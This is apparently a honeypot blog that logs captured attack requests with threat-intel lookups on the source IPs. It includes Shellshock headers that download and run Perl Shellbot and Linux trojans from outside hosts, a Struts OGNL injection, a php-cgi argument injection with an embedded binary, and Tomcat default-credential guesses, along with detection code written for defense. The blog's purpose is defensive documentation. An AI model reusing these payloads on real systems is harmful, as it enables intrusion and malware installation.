  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt


Monday, 12 October 2015

221.3.153.172 - perl Trojan via Shellshock - CC 69.89.2.153

BEGIN OF HTTP DATA:
2015-10-12 16:49:05
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET /cgi-mod/index.cgi HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://somere.ru/license.txt -O /tmp/license.txt;curl -O /tmp/license.txt http://somere.ru/license.txt;perl /tmp/license.txt ; rm -rf license.txt;rm -fr license.*");'
Host: 109.234.106.8
Connection: Close
ClamAV reports it as:

license.txt: Trojan.Perl.Shellbot-2 FOUND

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt


The hardcoded C&C address is:

69.89.2[.]153

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS20141 Quality Technology Services, LLC.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/69.89.2.153

Saturday, 10 October 2015

199.115.117.88 - GET /admin/i18n/readme.txt

BEGIN OF HTTPS DATA:
2015-10-09 16:41:51
Source IP: 199.115.117.88
Country: US RiskScore: 8.6 Malware: []
GET /admin/i18n/readme.txt HTTP/1.1
Host: 195.169.125.87
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.8.0

199.115.117[.]88

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS30633 Leaseweb USA, Inc.
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/199.115.117.88
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/199.115.117.88
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

61.186.245.211 - com.opensymphony.xwork2

BEGIN OF HTTP DATA:
2015-10-09 20:30:25
Source IP: 61.186.245.211
Country: CN RiskScore: 1 Malware: []
POST /getNews.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 195.169.125.87
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive

redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
 END OF DATA

61.186.245[.]211

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.186.245.211
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

177.157.43.206 - /webcalendar/install/index.php

BEGIN OF HTTP DATA:
2015-10-10 01:01:15
Source IP: 177.157.43.206
Country: BR RiskScore: 1 Malware: []
GET /webcalendar/install/index.php HTTP/1.1
TE: deflate,gzip;q=0.3
Keep-Alive: 300
Connection: Keep-Alive, TE
Host: 195.169.125.87
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
This caught my eye because of an available exploit for webcalendar, see here:
https://www.exploit-db.com/exploits/18775/

177.157.43[.]206

    Static Source: GeoIP data
  • Country: Brazil
  • ASN: AS18881 Global Village Telecom
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/177.157.43.206
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Thursday, 8 October 2015

208.100.26.231 - MongoDB scanning ip

I found the IP scanning and sending random data to almost all services on my honeypot.

28 events like:
BEGIN OF MONGODB DATA:
2015-10-09 00:11:14
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
GET / HTTP/1.0

208.100.26[.]231

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Feed search for 208.100.26[.]231

    Source: Local Feed Database
  • Title: 208.100.26.231 - fire on port 8080
  • Reference: http://sendmespamids.blogspot.com/2015/09/20810026231-fire-on-port-8080.html
  • In db since: 2015-09-24 08:17:16.658000

Mittwoch, 7. Oktober 2015

208.100.26.230 - Several FTP attempts

BEGIN OF FTP DATA:
2015-10-08 02:08:56
Source IP: 208.100.26.230
Country: US RiskScore: 1 Malware: []
Basically every access method was tried; in the logs I can see:
  • HTTP
  • Kerberos
  • Lanman
  • etc.

208.100.26[.]230

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.230
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Dienstag, 6. Oktober 2015

62.210.157.90 - shellbot via 23.229.121.186

BEGIN OF HTTP DATA:
2015-10-07 05:42:05
Source IP: 62.210.157.90
Country: FR RiskScore: 1 Malware: []
GET /hello HTTP/1.0
Host: 109.234.106.8
User-Agent: () { :;}; /bin/bash -c "cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*"
When I try to download the malware, ZoneAlarm reports a Backdoor.Perl.Shellbot.s.


62.210.157[.]90

    Static Source: GeoIP data
  • Country: France
  • ASN: AS12876 ONLINE S.A.S.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.210.157.90
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

23.229.121[.]186

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS36352 ColoCrossing
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/23.229.121.186

Sonntag, 4. Oktober 2015

187.210.107.242 - wget from 79.99.248.2

BEGIN OF HTTP DATA:
2015-10-04 16:57:03
Source IP: 187.210.107.242
Country: MX RiskScore: 10 Malware:
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget 79.99.248.2/TEST231;curl 79.99.248.2/TEST231;fetch 79.99.248.2/TEST231;lwp-download 79.99.248.2/TEST231;GET 79.99.248.2/TEST231");'
Host: 109.234.106.8
Connection: Close


79.99.248[.]2

    Static Source: GeoIP data
  • Country: Georgia
  • ASN: AS44877 Vtel-Georgia
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/79.99.248.2

187.210.107[.]242

    Static Source: GeoIP data
  • Country: Mexico
  • ASN: AS8151 Uninet S.A. de C.V.
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/187.210.107.242
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/187.210.107.242
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Dynamic Source: projecthoneypot.org
  • Last seen: 20 day(s) ago
  • Score: 25 (25 = 100 Spam per day, 75 = 1mio Spam per day)
  • Category: Suspicious (1)


Samstag, 3. Oktober 2015

61.160.247.11 - Authorization: Basic attempts

BEGIN OF HTTP DATA:
2015-10-02 08:08:13
Source IP: 61.160.247.11
Country: CN RiskScore: 1 Malware: []
GET /manager/html HTTP/1.1
Authorization: Basic cm9vdDpzM2NyZXQ=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host:4393160:80

61.160.247[.]11

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.160.247.11
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

Authorization: Basic cm9vdDphZG1pbg==
Authorization: Basic cm9vdDp0b21jYXQ=
Authorization: Basic cm9vdDpyb290
Authorization: Basic cm9vdDpwYXNzd29yZA==
Authorization: Basic cm9vdDpzM2NyZXQ=
Authorization: Basic cm9vdDptYW5hZ2Vy
Authorization: Basic YWRtaW46YWRtaW4=
Authorization: Basic YWRtaW46dG9tY2F0
Authorization: Basic YWRtaW46cm9vdA==
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Authorization: Basic YWRtaW46czNjcmV0
Authorization: Basic YWRtaW46bWFuYWdlcg==
Authorization: Basic bWFuYWdlcjphZG1pbg==
Authorization: Basic bWFuYWdlcjp0b21jYXQ=
Authorization: Basic bWFuYWdlcjpyb290
Authorization: Basic bWFuYWdlcjpwYXNzd29yZA==
Authorization: Basic bWFuYWdlcjpzM2NyZXQ=
Authorization: Basic bWFuYWdlcjptYW5hZ2Vy
Authorization: Basic dG9tY2F0OmFkbWlu
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Authorization: Basic dG9tY2F0OnJvb3Q=
Authorization: Basic dG9tY2F0OnBhc3N3b3Jk
Authorization: Basic dG9tY2F0OnMzY3JldA==
Authorization: Basic dG9tY2F0Om1hbmFnZXI=
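
The Basic headers above are just base64 of user:password, so a log reader can decode them and see the guessing pattern at once. The following is an added example (my code, not tooling from this blog); the header lines are copied from the list above, and the function names decode_basic and summarise are my own:

```python
"""Decode the 'Authorization: Basic' headers logged above and summarise the
credential guessing behind them. Added example, not the blog's own tooling."""
import base64
import binascii
from collections import Counter

# The 24 headers from the post, one per line (copied from the log above).
LOGGED_HEADERS = """\
Authorization: Basic cm9vdDphZG1pbg==
Authorization: Basic cm9vdDp0b21jYXQ=
Authorization: Basic cm9vdDpyb290
Authorization: Basic cm9vdDpwYXNzd29yZA==
Authorization: Basic cm9vdDpzM2NyZXQ=
Authorization: Basic cm9vdDptYW5hZ2Vy
Authorization: Basic YWRtaW46YWRtaW4=
Authorization: Basic YWRtaW46dG9tY2F0
Authorization: Basic YWRtaW46cm9vdA==
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Authorization: Basic YWRtaW46czNjcmV0
Authorization: Basic YWRtaW46bWFuYWdlcg==
Authorization: Basic bWFuYWdlcjphZG1pbg==
Authorization: Basic bWFuYWdlcjp0b21jYXQ=
Authorization: Basic bWFuYWdlcjpyb290
Authorization: Basic bWFuYWdlcjpwYXNzd29yZA==
Authorization: Basic bWFuYWdlcjpzM2NyZXQ=
Authorization: Basic bWFuYWdlcjptYW5hZ2Vy
Authorization: Basic dG9tY2F0OmFkbWlu
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Authorization: Basic dG9tY2F0OnJvb3Q=
Authorization: Basic dG9tY2F0OnBhc3N3b3Jk
Authorization: Basic dG9tY2F0OnMzY3JldA==
Authorization: Basic dG9tY2F0Om1hbmFnZXI=
"""


def decode_basic(header_line):
    """Return (user, password) for a well-formed Basic header, else None."""
    name, _, value = header_line.partition(":")
    if name.strip().lower() != "authorization":
        return None
    scheme, _, token = value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None                      # Bearer, Digest, ... are not our concern here
    try:
        raw = base64.b64decode(token.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None                      # garbage after the scheme: skip, do not crash
    creds = raw.decode("utf-8", errors="replace")
    if ":" not in creds:
        return None                      # RFC 7617 requires user:password
    user, _, password = creds.partition(":")
    return user, password


def summarise(lines, threshold=10):
    """Aggregate decoded attempts and flag a systematic user x password grid."""
    attempts = [c for c in map(decode_basic, lines) if c is not None]
    users = Counter(u for u, _ in attempts)
    passwords = Counter(p for _, p in attempts)
    distinct_pairs = len(set(attempts))
    return {
        "attempts": len(attempts),
        "users": dict(users),
        "passwords": dict(passwords),
        # No pair repeated and |users| * |passwords| == attempts: the client
        # walked the full grid, which no legitimate login retry does.
        "bruteforce": (len(attempts) >= threshold
                       and distinct_pairs == len(attempts)
                       and len(users) * len(passwords) == len(attempts)),
    }


if __name__ == "__main__":
    report = summarise(LOGGED_HEADERS.splitlines())
    print(report["attempts"], "attempts, users:", sorted(report["users"]))
    print("passwords:", sorted(report["passwords"]), "bruteforce:", report["bruteforce"])
```

On the 24 headers this yields 4 users times 6 passwords with no repeats, i.e. the client enumerated the whole grid against /manager/html. The same summary over a real access log, keyed per source IP, is a cheap Tomcat manager brute-force detector; the decoder deliberately returns None for malformed tokens so a single odd header does not abort the pass.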

Mittwoch, 30. September 2015

61.161.130.241 - ChinaZ attempt via 61.160.212.172

BEGIN OF HTTP DATA:
2015-09-30 11:05:18
Source IP: 61.161.130.241
Country: CN RiskScore: 1 Malware: []
GET / HTTP/1.1
Host: 109.234.106.8
Referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Accept:*/*
User-Agent: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Connection:Keep-Alive
I did not think I would see that again :-)
java: Linux.Trojan.Agent FOUND

61.161.130[.]241

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.161.130.241

61.160.212[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.160.212.172


Sonntag, 27. September 2015

113.204.53.134 - com.opensymphony.xwork2.dispatcher

BEGIN OF HTTP DATA:
2015-09-26 14:05:03
Source IP: 113.204.53.134
Country: CN RiskScore: 1 Malware: []
POST /unAuthorizedAccess.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 109.234.106.8
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive

redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
Decoded, to make it more readable:
redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}

113.204.53[.]134

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/113.204.53.134
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt?n=99999999999999999999

Montag, 21. September 2015

46.172.71.251 - simple bash injection

BEGIN OF HTTP DATA:
2015-09-21 20:45:43
Source IP: 46.172.71.251
Country: UA RiskScore: 10 Malware: []
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close
46.172.71[.]251
    Static Source: GeoIP data
  • Country: Ukraine
  • ASN: AS43110 Joint Ukrainian-American enterprise Ewropol with legal form Ltd
    Dynamic Source: IBM X-Force Exchange
  • Score: 8.6
  • Reference: https://exchange.xforce.ibmcloud.com/ip/46.172.71.251
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/46.172.71.251
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

94.180.115.102 - php Buffer overflow attempt

BEGIN OF HTTP DATA:
2015-09-22 03:24:28
Source IP: 94.180.115.102
Country: RU RiskScore: 1 Malware: []
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 43604
Connection: close
<?php
$bufferf = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAAAAEDwQAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAACAEAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAA5EMAAAAAAADkQwAAAAAAAAAAEAAAAAAAAQAAAAYAAADgmwAAAAAAAOCbUAAAAAAA4JtQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAB1k/mqVVBYIeAHDRYAAAAAYJ4AAGCeAAAAAgAAsAAAAAIAAAD7+yH/f0VMRgIBAQACAD4ADdAbQA+7ZL8XBQCglyITOADdsu67CAUbABoABg8FJwdA5IQ8IcABAAgA2GCT7gNwBHhABwIyIU8cAAAB+cAG9m+NB2SJADyTbQkAEDcGkJ6dkO8HUDAFN+ALN
The percent-encoded request line decodes to:

POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env="yes"+-d+cgi.fix_pathinfo=1+-d+auto_prepend_file=php://input+-n HTTP/1.1
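
Both this request and the com.opensymphony.xwork2.dispatcher post above only become readable after percent-decoding, and in both cases the interesting part is what the decoded text means to the server: php-cgi treats a query string that contains no literal '=' as command-line arguments, so "-d" directives encoded as %2D%64 reach the interpreter, and a Struts parameter starting with ${ is evaluated as OGNL. The following is an added example (my code, not the blog's) that decodes and flags both shapes; the two sample requests are copied from the log entries above with the argument list shortened, and analyze_request, php_cgi_directives and DANGEROUS_DIRECTIVES are names I chose:

```python
"""Decode and flag two request shapes from the honeypot log: php-cgi argument
injection through a query string without a literal '=', and an OGNL expression
sent as a Struts parameter. Added example, not the blog's own tooling."""
import re
from urllib.parse import unquote_plus, urlsplit

# Request line of the php-cgi post above, shortened to three arguments
# (%2D%64 = "-d", %3D = "=", %2D%6E = "-n").
PHP_CGI_LINE = (
    "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E"
    "+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74"
    "+%2D%6E HTTP/1.1"
)

# Body of the Struts post above, shortened to the part that reads the servlet context.
OGNL_BODY = (
    "redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),"
    "%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22))}"
)

# PHP settings whose presence in a query string turns php-cgi into a loader for
# code supplied in the request body (values as seen in the log).
DANGEROUS_DIRECTIVES = {
    "allow_url_include": "on",
    "auto_prepend_file": "php://input",
    "safe_mode": "off",
    "open_basedir": "none",
    "disable_functions": '""',
}

# ${ or %{ followed by a reference into the OGNL value stack
OGNL_PATTERN = re.compile(r"[$%]\{.*?#(?:context|_memberAccess|application)")


def parse_request_line(line):
    """'POST /path?query HTTP/1.1' -> (method, path, raw_query)."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    return method, parts.path, parts.query


def php_cgi_directives(raw_query):
    """Map '-d name=value' pairs in a query that CGI would pass as argv.
    RFC 3875 only turns the query into arguments when it has no literal '=',
    which is exactly why the attacker encodes '=' as %3D."""
    if "=" in raw_query:
        return {}
    args = unquote_plus(raw_query).split()
    directives = {}
    for flag, setting in zip(args, args[1:]):
        if flag == "-d" and "=" in setting:
            name, value = setting.split("=", 1)
            directives[name] = value
    return directives


def analyze_request(request_line, body=""):
    """Return a list of (finding, detail) for one request."""
    findings = []
    _method, path, raw_query = parse_request_line(request_line)
    if path.startswith("/cgi-bin/php"):
        hits = {k: v for k, v in php_cgi_directives(raw_query).items()
                if DANGEROUS_DIRECTIVES.get(k) == v}
        if hits:
            findings.append(("php-cgi-argument-injection", hits))
    for where, text in (("query", unquote_plus(raw_query)), ("body", unquote_plus(body))):
        m = OGNL_PATTERN.search(text)
        if m:
            findings.append(("ognl-expression", {where: m.group(0)[:60]}))
    return findings


if __name__ == "__main__":
    print(analyze_request(PHP_CGI_LINE))
    print(analyze_request("POST /unAuthorizedAccess.action HTTP/1.1", OGNL_BODY))
    print(analyze_request("GET /index.php?id=1&redirect=home HTTP/1.1"))
```

The '=' check is the point worth keeping: a query such as ?-d+foo=bar is handed to PHP as a normal GET variable and is harmless, so php_cgi_directives returns nothing for it; only the fully encoded form becomes argv. The OGNL check deliberately looks for a stack reference (#context and friends) rather than any ${...}, since templating braces show up in legitimate traffic too.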
94.180.115[.]102
    Static Source: GeoIP data
  • Country: Russian Federation
  • ASN: AS43478 CJSC ER-Telecom Holding
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/94.180.115.102
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt


208.100.26.231 - fire on port 8080

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:24
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^V^C^@^@S^A^@^@O^C^@?G<D7><F7><BA>,<EE><EA><B2>`~<F3>^@<FD><82>{<B9>Ֆ<C8>w<9B><E6><C4><DB><=<DB>o<EF>^Pn^@^@(^@^V^@^S^@
^@f^@^E^@^D^@e^@d^@c^@b^@a^@`^@^U^@^R^@ ^@^T^@^Q^@^H^@^F^@^C^A^@
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:29
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@^@^@qj<81>n0<81>k<A1>^C^B^A^E<A2>^C^B^A
<A4><81>^0\<A0>^G^C^E^@P<80>^@^P<A2>^DESC^BNM<A3>^W0^U<A0>^C^B^A^@<A1>^N0^LESC^FkrbtgtESC^BNM<A5>^Q^X^O19700101000000Z<A7>^F^B^D^_^^<B9>٨^W0^U^B^A^R^B^A^Q^B^A^P^B^A^W^B^A^A^B^A^C^B^A^B
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:34
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@^@^@<A4><FF>SMBr^@^@^@^@^H^A@^@^@^@^@^@^@^@^@^@^@^@^@^@^@@^F^@^@^A^@^@<81>^@^BPC NETWORK PROGRAM 1.0^@^BMICROSOFT NETWORKS 1.03^@^BMICROSOFT NETWORKS 3.0^@^BLANMAN1.0^@^BLM1.2X002^@^BSamba^@^BNT LANMAN 1.0^@^BNT LM 0.12^@
 END OF DATA
BEGIN OF TOMCAT DATA:
2015-09-22 00:34:26
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
:^@^@^@/^@^@^@^B^@^@@^B^O^@^A^@=^E^@^@^@^@^@^@^@^@^@^@^@^@/^@^@^@^@^@^@^@^@^@@^_^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:34:31
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^A^@^@<FD><CE><FA>^K<B0><A0>^@^@^@MMS^T^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^R^@^@^@^A^@^C^@<F0><F0><F0><F0>^K^@^D^@^\^@^C^@N^@S^@P^@
l^@a^@y^@e^@r^@/^@9^@.^@0^@.^@0^@.^@2^@9^@8^@0^@;^@ ^@{^@0^@0^@0^@0^@A^@A^@0^@0^@-^@0^@A^@0^@0^@-^@0^@0^@a^@0^@-^@A^@A^@0^@A^@
-^@0^@0^@0^@0^@A^@0^@A^@A^@0^@A^@A^@0^@}^@^@^@<E0>m<DF>_
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:34:37
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@Z^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@ ^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(CONNECT_DAT
A=(COMMAND=version))
 END OF DATA
Although I am not able to read the exact attempts, there have been several different events.
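
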